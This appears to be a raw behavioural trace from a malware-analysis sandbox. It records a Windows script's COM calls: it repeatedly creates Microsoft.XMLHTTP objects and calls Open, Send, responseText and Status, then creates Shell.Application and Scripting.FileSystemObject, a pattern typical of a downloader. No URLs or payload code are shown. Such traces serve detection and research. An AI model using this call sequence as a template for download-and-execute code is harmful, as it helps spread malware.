	[0406.866] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0406.866] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0406.866] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0406.866] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0406.867] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0406.867] longjmp () 
	[0406.867] longjmp () 
	[0406.867] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0406.867] SysStringLen (param_1=0x0) returned 0x0
	[0406.867] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0406.867] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0406.867] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b80) returned 0x0
	[0406.867] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0406.867] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5be8) returned 0x0
	[0406.868] ??2@YAPEAX_K@Z () returned 0x62f310
	[0406.868] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5be8, pUnkSite=0x62f310) 
	[0406.868] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0406.868] XMLHTTPRequest:IUnknown:Release (This=0x49c5be8) returned 0x0
	[0406.868] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b80) returned 0x0
	[0406.868] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b80) returned 0x3
	[0406.868] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0406.868] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b80, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0406.868] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0406.868] longjmp () 
	[0406.868] longjmp () 
	[0406.869] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0406.869] SysStringLen (param_1=0x0) returned 0x0
	[0406.869] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0406.869] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0406.869] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7300) returned 0x0
	[0406.869] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0406.869] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0406.869] ??2@YAPEAX_K@Z () returned 0x62f330
	[0406.869] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0406.869] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0406.869] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0406.869] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7300) returned 0x0
	[0406.869] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7300) returned 0x3
	[0406.870] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0406.870] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7300, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0406.870] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0406.870] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0406.870] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7300, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0406.870] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0408.241] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0408.241] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7300, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0408.241] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0408.241] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0408.241] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7300, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0408.241] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0408.241] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0408.241] SysStringLen (param_1=0x0) returned 0x0
	[0408.241] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0408.242] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0408.242] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0408.242] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0408.242] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0408.242] ??2@YAPEAX_K@Z () returned 0x62f350
	[0408.242] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0408.242] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0408.242] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0408.242] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0408.242] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0408.242] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0408.242] SysStringLen (param_1=0x0) returned 0x0
	[0408.242] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0408.245] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0408.245] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0408.245] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0408.245] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0408.245] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0408.245] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0408.844] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0408.845] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7300, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0408.845] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0408.846] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0408.846] SysStringLen (param_1=0x0) returned 0x0
	[0408.846] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0408.847] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0408.847] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7300) returned 0x0
	[0408.847] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0408.847] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c88) returned 0x0
	[0408.847] ??2@YAPEAX_K@Z () returned 0x62f330
	[0408.847] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c88, pUnkSite=0x62f330) 
	[0408.847] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0408.847] XMLHTTPRequest:IUnknown:Release (This=0x49c5c88) returned 0x0
	[0408.847] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7300) returned 0x0
	[0408.847] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7300) returned 0x3
	[0408.847] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0408.847] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7300, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0408.850] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0408.850] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0408.850] SysStringLen (param_1=0x0) returned 0x0
	[0408.850] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0408.850] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0408.850] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0408.850] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0408.850] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74a8) returned 0x0
	[0408.850] ??2@YAPEAX_K@Z () returned 0x62f310
	[0408.850] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74a8, pUnkSite=0x62f310) 
	[0408.850] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0408.850] XMLHTTPRequest:IUnknown:Release (This=0x49c74a8) returned 0x0
